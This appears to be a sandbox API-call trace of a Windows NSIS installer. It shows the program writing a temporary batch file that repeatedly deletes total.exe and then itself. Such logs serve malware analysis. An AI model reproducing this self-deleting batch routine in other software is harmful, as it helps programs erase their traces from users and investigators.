(lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.532] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.532] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.532] lstrcpynA (in: lpString1=0x3369ac, lpString2="kernel32::GetShortPathName(t R0, t.R0,i 1024)", iMaxLength=1024 | out: lpString1="kernel32::GetShortPathName(t R0, t.R0,i 1024)") returned="kernel32::GetShortPathName(t R0, t.R0,i 1024)" [0160.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.532] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.532] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0160.533] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.533] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0160.533] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.533] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.533] lstrcpyA (in: lpString1=0x33e508, lpString2="GetShortPathName" | out: lpString1="GetShortPathName") returned="GetShortPathName" [0160.533] lstrcpynA (in: lpString1=0x340df8, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0160.533] lstrcpynA (in: lpString1=0x3409f0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0160.533] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.533] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.533] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.533] GetShortPathNameA (in: lpszLongPath="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", lpszShortPath=0x3401e0, cchBuffer=0x400 | out: lpszShortPath="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned 0x25 [0160.534] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0160.534] lstrcpynA (in: lpString1=0x341200, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0160.534] lstrcpyA (in: lpString1=0x432800, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0160.534] lstrcpynA (in: lpString1=0x341200, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0160.534] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0160.534] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned 37 [0160.534] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.534] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 42 [0160.534] lstrcpynA (in: lpString1=0x432800, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.534] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.534] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 42 [0160.534] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.535] wsprintfA (in: param_1=0x432c00, param_2="%d" | out: param_1="404") returned 3 [0160.535] lstrcpynA (in: lpString1=0x40a818, lpString2=":try\r\n", iMaxLength=1024 | out: lpString1=":try\r\n") returned=":try\r\n" [0160.535] lstrlenA (lpString=":try\r\n") returned 6 [0160.535] WriteFile (in: hFile=0x194, lpBuffer=0x40a818*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x18fbd8, lpOverlapped=0x0 | out: lpBuffer=0x40a818*, lpNumberOfBytesWritten=0x18fbd8*=0x6, lpOverlapped=0x0) returned 1 [0160.536] lstrcpynA (in: lpString1=0x40a818, lpString2="ping localhost -n 2 >NUL\r\n", iMaxLength=1024 | out: lpString1="ping localhost -n 2 >NUL\r\n") returned="ping localhost -n 2 >NUL\r\n" [0160.536] lstrlenA (lpString="ping localhost -n 2 >NUL\r\n") returned 26 [0160.536] WriteFile (in: hFile=0x194, lpBuffer=0x40a818*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x18fbd8, lpOverlapped=0x0 | out: lpBuffer=0x40a818*, lpNumberOfBytesWritten=0x18fbd8*=0x1a, lpOverlapped=0x0) returned 1 [0160.536] lstrcpynA (in: lpString1=0x42e3a4, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.537] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned 46 [0160.537] lstrcpynA (in: lpString1=0x40a818, lpString2="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\r\n", iMaxLength=1024 | out: lpString1="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\r\n") returned="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\r\n" [0160.537] lstrlenA (lpString="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\r\n") returned 52 [0160.537] WriteFile (in: hFile=0x194, lpBuffer=0x40a818*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x18fbd8, lpOverlapped=0x0 | out: lpBuffer=0x40a818*, lpNumberOfBytesWritten=0x18fbd8*=0x34, lpOverlapped=0x0) returned 1 [0160.537] lstrcpynA (in: lpString1=0x42e3a9, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.537] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned 46 [0160.537] lstrcpynA (in: lpString1=0x40a818, lpString2="if exist C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe goto try\r\n", iMaxLength=1024 | out: lpString1="if exist C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe goto try\r\n") returned="if exist C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe goto try\r\n" [0160.537] lstrlenA (lpString="if exist C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe goto try\r\n") returned 66 [0160.537] WriteFile (in: hFile=0x194, lpBuffer=0x40a818*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x18fbd8, lpOverlapped=0x0 | out: lpBuffer=0x40a818*, lpNumberOfBytesWritten=0x18fbd8*=0x42, lpOverlapped=0x0) returned 1 [0160.537] lstrcpynA (in: lpString1=0x42e3a4, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.537] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 42 [0160.537] lstrcpynA (in: lpString1=0x40a818, lpString2="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat\r\n", iMaxLength=1024 | out: lpString1="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat\r\n") returned="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat\r\n" [0160.537] lstrlenA (lpString="del C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat\r\n") returned 48 [0160.537] WriteFile (in: hFile=0x194, lpBuffer=0x40a818*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18fbd8, lpOverlapped=0x0 | out: lpBuffer=0x40a818*, lpNumberOfBytesWritten=0x18fbd8*=0x30, lpOverlapped=0x0) returned 1 [0160.537] CloseHandle (hObject=0x194) returned 1 [0160.537] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.537] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 42 [0160.537] lstrcpynA (in: lpString1=0x3369ac, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.537] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.538] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.538] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.538] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.538] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.538] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.538] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.538] lstrcpynA (in: lpString1=0x336df4, lpString2="S", iMaxLength=1024 | out: lpString1="S") returned="S" [0160.538] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.538] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.538] lstrcpynA (in: lpString1=0x40a418, lpString2="Store", iMaxLength=1024 | out: lpString1="Store") returned="Store" [0160.538] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.538] GetProcAddress (hModule=0x75710000, lpProcName="Store") returned 0x757110e0 [0160.539] lstrcpynA (in: lpString1=0x336df4, lpString2="error", iMaxLength=1024 | out: lpString1="error") returned="error" [0160.539] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.539] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.539] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.539] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.539] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.539] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.539] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.539] lstrcpynA (in: lpString1=0x33723c, lpString2="72", iMaxLength=1024 | out: lpString1="72") returned="72" [0160.539] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.539] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.539] lstrcpynA (in: lpString1=0x40a418, lpString2="Alloc", iMaxLength=1024 | out: lpString1="Alloc") returned="Alloc" [0160.539] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.539] GetProcAddress (hModule=0x75710000, lpProcName="Alloc") returned 0x75711000 [0160.539] wsprintfA (in: param_1=0x18f98c, param_2="%d" | out: param_1="3098296") returned 7 [0160.540] lstrcpynA (in: lpString1=0x33723c, lpString2="3098296", iMaxLength=1024 | out: lpString1="3098296") returned="3098296" [0160.540] lstrcpynA (in: lpString1=0x430800, lpString2="3098296", iMaxLength=1024 | out: lpString1="3098296") returned="3098296" [0160.540] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.540] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.540] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.540] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.540] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.540] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.540] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.540] lstrcpynA (in: lpString1=0x42e3a1, lpString2="3098296", iMaxLength=1024 | out: lpString1="3098296") returned="3098296" [0160.540] lstrlenA (lpString="3098296") returned 7 [0160.540] lstrcpynA (in: lpString1=0x33723c, lpString2="*3098296(i72)", iMaxLength=1024 | out: lpString1="*3098296(i72)") returned="*3098296(i72)" [0160.540] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.540] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.540] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0160.540] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.541] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0160.541] lstrcpyA (in: lpString1=0x33e508, lpString2="3098296" | out: lpString1="3098296") returned="3098296" [0160.541] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.541] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="72") returned 2 [0160.541] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.541] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.541] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.541] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.541] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.541] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.541] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.541] lstrcpynA (in: lpString1=0x33723c, lpString2="*(i,i,i,i)i.r3", iMaxLength=1024 | out: lpString1="*(i,i,i,i)i.r3") returned="*(i,i,i,i)i.r3" [0160.541] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.541] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.541] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0160.542] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.542] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0160.542] lstrcpyA (in: lpString1=0x33e508, lpString2="" | out: lpString1="") returned="" [0160.542] lstrcpynA (in: lpString1=0x3409f0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.542] lstrcpynA (in: lpString1=0x3409f0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.542] lstrcpynA (in: lpString1=0x3409f0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.542] lstrcpynA (in: lpString1=0x3409f0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.542] lstrcpynA (in: lpString1=0x3409f0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.542] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0160.542] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0160.542] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0160.542] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="0") returned 1 [0160.542] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="3281864") returned 7 [0160.542] lstrcpyA (in: lpString1=0x430c00, lpString2="3281864" | out: lpString1="3281864") returned="3281864" [0160.542] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.543] lstrcpynA (in: lpString1=0x3369ac, lpString2="error", iMaxLength=1024 | out: lpString1="error") returned="error" [0160.543] lstrcpynA (in: lpString1=0x336df4, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.543] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 